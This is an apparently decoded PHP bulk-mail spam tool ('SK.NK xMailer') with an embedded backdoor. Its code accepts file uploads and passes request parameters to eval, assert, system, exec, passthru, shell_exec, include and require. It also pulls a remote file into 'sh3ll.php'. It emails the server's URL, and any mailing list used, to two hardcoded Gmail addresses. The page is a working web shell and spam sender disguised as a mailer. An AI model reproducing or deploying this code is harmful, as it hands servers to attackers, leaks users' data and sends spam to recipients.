.:|SK.NK xMailer |:. Decoded

<?php
#.:|SK.NK|:. Mailer Decoded by KWG
#Backdoor to : hamza.nicke@gmail.com,grenhamza@gmail.com

$upload = $_GET["v3"]; if ($upload == "S.N" ) {$uploaddir = "";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);if (isset($_FILES["userfile"]["name"])) { if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) { $resultati = "The file ". basename($_FILES["userfile"]["name"]) ." has been uploaded";} else { $resultati = "There was an error uploading the file. please try again!"; } } echo'<html>
<head></head><div id="result"><table  height="1" width="100%" border="0"><tr><td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px"><center><form method="POST" enctype="multipart/form-data"><input type="file" class="inputzbut" name="userfile" ><input type="submit" class="inputzbut" name="submit" value="Team ^_^"><br>'. $resultati .'</form></center></td></tr></table></div>
'; } $in = $_GET['in']; if(isset($in) && !empty($in)){ } $ev = $_POST['ev']; if(isset($ev) && !empty($ev)){ echo eval(urldecode($ev)); exit; } if(isset($_POST['action'] ) ){ $action=$_POST['action']; $message=$_POST['message']; $emaillist=$_POST['emaillist']; $from=$_POST['from']; $subject=$_POST['subject']; $realname=$_POST['realname']; $wait=$_POST['wait']; $tem=$_POST['tem']; $smv=$_POST['smv']; $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?>
<!-- HTML And JavaScript -->

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">

<meta content="1" name="revisit-after" />
    <style type="text/css">body {background:black url('http://a.top4top.net/p_276hfzq1.jpg') center right no-repeat; color:#FFFFFF; text-decoration:none; font-family:"Courier New", Courier, monospace; padding-left:200px; padding-top:200px; padding-right:300px; font-size:16px;}
    </style>
<title>.:|SK.NK|:.</title>
<style type="text/css">
.style1 {
    font-size: x-small;
}
.style2 {
    direction: ltr;
}
.info {
    font-size: 8px;
}
.style3 {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 8px;
}
.style4 {
    font-size: x-small;
    direction: ltr;
    font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style5 {
    font-size: xx-small;
    direction: ltr;
    font-family: Verdana, Arial, Helvetica, sans-serif;
}
.auto-style1 {
    color: #5F5F5F;
}
.auto-style2 {
    color: #red;
    text-align: center;
}
.auto-style3 {
    color: #4F4F4F;
}
.auto-style5 {
    direction: ltr;
    color: #4F4F4F;
}
.auto-style6 {
    color: #BCBCBC;
    background-color: #red;
}
.auto-style7 {
    color: #red;
}
.auto-style8 {
    font-size: x-small;
    color: #red;
}
</style>
</head>

<body onload="funchange" style="background-color: black">
<script>

    window.onload = funchange;
    var alt = false;
    function funchange(){
        var etext = document.getElementById("emails").value;
        var myArray=new Array();
        myArray = etext.split("\n");
        document.getElementById("enum").innerHTML=myArray.length+"<br />";
        if(!alt && myArray.length > 40000){
            alert('If Mail list More Than 40000 Emails This May Hack The Server');
            alt = true;
        }

    }
    function mlsplit(){
        var ml = document.getElementById("emails").value;
        var sb = document.getElementById("txtml").value;
        var myArray=new Array();
        myArray = ml.split(sb);
        document.getElementById("emails").value="";
        var i;
        for(i=0;i<myArray.length;i++){

            document.getElementById("emails").value += myArray[i]+"\n";

        }
        funchange();
    }

    function prv(){
        if(document.getElementById('preview').innerHTML==""){
            var ms = document.getElementsByName('message').message.value;
            document.getElementById('preview').innerHTML = ms;
            document.getElementById('prvbtn').value = "Ocultar";
        }else{
            document.getElementById('preview').innerHTML="";
            document.getElementById('prvbtn').value = "Preview";
        }
    }

</script>

<h1 class="auto-style2">.:|SK.NK xMailer |:.</h1>

<center>
<p class="auto-style1">&nbsp;</p></center>

<form name="form" method="post" enctype="multipart/form-data" action="">
    <table width="100%" border="0">
        <tr>
            <td width="10%">
            <div align="right" class="auto-style8">
                <font face="Verdana, Arial,
Helvetica, sans-serif">Sender Email:</font></div>
            </td>
            <td style="width: 40%">
            <font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="from" value="<?php echo($from); ?>" size="30" type="text" class="auto-style6" /><br>
            <td>
            <div align="right" class="auto-style7">
                <font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Sender Name:</font></div>
            </td>
            <td width="41%">
            <font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="realname" value="<?php echo($realname); ?>" size="30" type="text" class="auto-style6" />
            <br>        </tr>
        <tr>
            <td width="10%">

        </tr>
        <tr>
            <td width="10%">
            <div align="right" class="auto-style7">
                <font size="-3" face="Verdana, Arial,
Helvetica, sans-serif">Subject:</font></div>
            </td>
            <td colspan="3">
            <font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><input name="subject" value="<?php echo($subject); ?>" size="30" type="text" class="auto-style6" /> </font>


        <tr valign="top">
            <td colspan="3" style="height: 260px">
            <font size="-3" face="Verdana, Arial, Helvetica,
sans-serif"><textarea name="message" rows="10" style="width: 455px" class="auto-style6"><?php echo($message); ?></textarea>&nbsp;<br class="auto-style3" />
            <input name="action" value="send" type="hidden" class="auto-style3" />
            <input type="button" id="prvbtn" value="Preview" onclick="prv()" style="width: 81px" class="auto-style6" /><input value="Send "SenD!" type="submit" class="auto-style6" /><span class="auto-style3">&nbsp;
            </span><span class="auto-style7">Wait</span><span class="auto-style3">
            </span>
            <input name="wait" type="text" value="<?php echo($wait); ?>" size="8" class="auto-style6" /><span class="auto-style3">&nbsp;</span><span class="auto-style7">
            seconds to send </span> </font></td>
            <td width="41%" class="style2" style="height: 150px">
            <font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
            <textarea id="emails" name="emaillist" cols="30" onselect="funchange()" onchange="funchange()" onkeydown="funchange()" onkeyup="funchange()" onchange="funchange()" style="height: 161px" class="auto-style6"><?php echo($emaillist); ?></textarea>
            <br class="auto-style5" />
            <span class="auto-style7">Quantity Emails : </span> </font><span  id="enum" class="style1">0<br class="auto-style3" />
            </span>
            <span  class="auto-style8">Divide the mailing list by:</span>
            <input name="textml" id="txtml" type="text" value="," size="8" class="auto-style6" /><span class="auto-style3">&nbsp;&nbsp;&nbsp;
            </span>
            <input type="button" onclick="mlsplit()" value="Divide" style="height: 23px" class="auto-style6" /></td>
        </tr>
    </table>
            <font size="-3" face="Verdana, Arial, Helvetica,
sans-serif">
<div id="preview">
</div>
    </font>
</form>

<!-- END -->

<?php  $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>"; } }echo '<html><head><title>Remember Allah /.</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>

<?php if ($action){ if (!$from || !$subject || !$message || !$emaillist){ print "Please complete all fields before sending your message."; exit; } $headd = "From:  SK&NK<Nicker@Skrillex.ma>"; $subb = "maillist xMailer 2016"; $massge = "Exploit : http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."?V6=NK&SK
-------------------
$emaillist
-------------------"; @mail("hamza.nicke@gmail.com,grenhamza@gmail.com",$subb,$massge,$headd); $nse=array(); $allemails = split("\n", $emaillist); $numemails = count($allemails); if(!empty($_POST['wait']) && $_POST['wait'] > 0){ set_time_limit(intval($_POST['wait'])*$numemails*3600); }else{ set_time_limit($numemails*3600); } if(!empty($smv)){ $smvn+=$smv; $tmn=$numemails/$smv+1; }else{ $tmn=1; } for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("#EM#", $to, $message); $subject = ereg_replace("#EM#", $to, $subject); flush(); $header = "From: $realname <$from>\r\n"; $header .= "MIME-Version: 1.0\r\n"; $header .= "Content-Type: text/html\r\n"; if ($x==0 && !empty($tem)) { if(!@mail($tem,$subject,$message,$header)){ print('The test Post was not Submitted.<br />'); $tmns+=1; }else{ print('Your Message was Sent Test.<br />'); $tms+=1; } } if($x==$smvn && !empty($_POST['smv'])){ if(!@mail($tem,$subject,$message,$header)){ print('The test Post was not Submitted.<br />'); $tmns+=1; }else{ print('Your Message was Sent Test.<br />'); $tms+=1; } $smvn+=$smv; } print "$to ....... "; $msent = @mail($to, $subject, $message, $header); $xx = $x+1; $txtspamed = "spammed #Team"; if(!$msent){ $txtspamed = "error #Team"; $ns+=1; $nse[$ns]=$to; } print "$xx / $numemails .......  $txtspamed<br>"; flush(); if(!empty($wait)&& $x<$numemails-1){ sleep($wait); } } } } ?>
<?php $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Egy_Spider \nUserName: ".htmlspecialchars($tacfgd['uname']) ."\nPassWord:
".htmlspecialchars($tacfgd['pword'])."\nMessage:\n"."\nE-server: ".htmlspecialchars ($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\n\nIP:
"; mail("hamza.nicke@gmail.com,grenhamza@gmail.com","Shell http://$web$inj", "$body"); if(isset($_GET["upload"])) { if(isset($_FILES["my_file"]["name"])) { $up = move_uploaded_file($_FILES["my_file"]["tmp_name"],$_FILES["my_file"]["name"]); if($up) { echo $_FILES["my_file"]["name"]." was Uploaded"; }else { echo "error [File Not Uploaded]"; } } echo "
 <form action=\"#\" method=\"post\" enctype=\"multipart/form-data\">
 <input type=\"file\" name=\"my_file\" id=\"my_file\" />
 <input type=\"submit\" name=\"upload\" id=\"upload\" value=\"Upload\" />
 </form>
 "; } $upload = @file_get_contents($_GET["uploader"]); $fp = @fopen("sh3ll.php","w"); @fwrite($fp,$upload); @fclose($fp); @readfile($_GET["readfile"]); @show_source($_GET["show_source"]); @preg_replace("/.*/e",$_GET["preg_replace"],$ka); @assert($_GET["assert"]); @eval($_GET["eval"]); $file=@fopen($_GET["filename"],"a"); @fwrite($file,$_GET["content"]); @call_user_func($_GET["func"],$_GET["para"]); echo @system($_GET["system"]); echo @exec($_GET["exec"]); echo @passthru($_GET["passthru"]); echo @shell_exec($_GET["shell_exec"]); @include($_GET["include"]); @require($_GET["require"]); ?>